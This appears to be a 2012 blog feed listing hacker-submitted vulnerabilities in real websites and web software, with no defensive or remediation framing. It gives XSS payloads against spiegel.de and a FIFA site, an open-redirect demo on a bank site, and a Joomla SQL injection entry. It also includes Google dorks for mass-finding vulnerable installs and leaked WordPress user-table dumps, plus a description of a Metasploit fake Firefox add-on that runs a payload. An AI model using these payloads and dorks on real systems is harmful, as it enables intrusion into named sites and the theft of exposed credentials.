Friday, 11. May 2012
security.anti-abuse.com - xss
Date submitted: 14/12/2011
Date published: 10/05/2012

URL:
http://pastebin.com/mHjUghPv

by
Atmon3r



Tuesday, 24. April 2012
spiegel.de - XSS
URL: http://www.spiegel.de/artikelversand/online/a-823270-de.html

POST: f.emailempfang=alert(navigator.userAgent)

by
watt



Thursday, 12. April 2012
joomla (com_estateagent) - SQL
Exploit Title: joomla component (com_estateagent) SQL injection Vulnerability
Date: 10/04/2012
Author: xDarkSton3x
Category: webapps
Google dork: inurl:"com_estateagent"



Metasploit & Firefox Fake Extension (XPI)
This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.



Sunday, 1. April 2012
fifa - XSS
Domain:
de.predictor.fifa.com
URL:
hxxp://de.predictor.fifa.com/M/stats.mc?phase=2%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(%27XSS%20By%20Tur
KPoweR%20-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20:D%27)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20TurKPoweR%2
0-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20%20:D%3C/h1%3E%3C/marquee%3E

by
TurKPoweR



Monday, 26. March 2012
vBulletin 4.1.10 - XSS

vBulletin 4.1.10 XSS Vulnerability 2x from root and toor on Vimeo.



Friday, 23. March 2012
Various Banks - XSS
Demo:
http://www.banki.ru/bitrix/rku.php?id=829&goto=http://xxxxx.com

Google Dork:
inurl:bitrix/rk.php

by
Sony and Flexxpoint



Tuesday, 20. March 2012
Microsoft - XSS



Saturday, 17. March 2012
WordPress - SQL
Dork:
intext:INSERT INTO 'wp_users` VALUES(1, 'ADMIN'," intext:dump filetype:sql



Thursday, 15. March 2012
Volusion Chat - XSS
Software Link:
http://www.volusion.com/
Google Dorks:
inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion

by
Sony
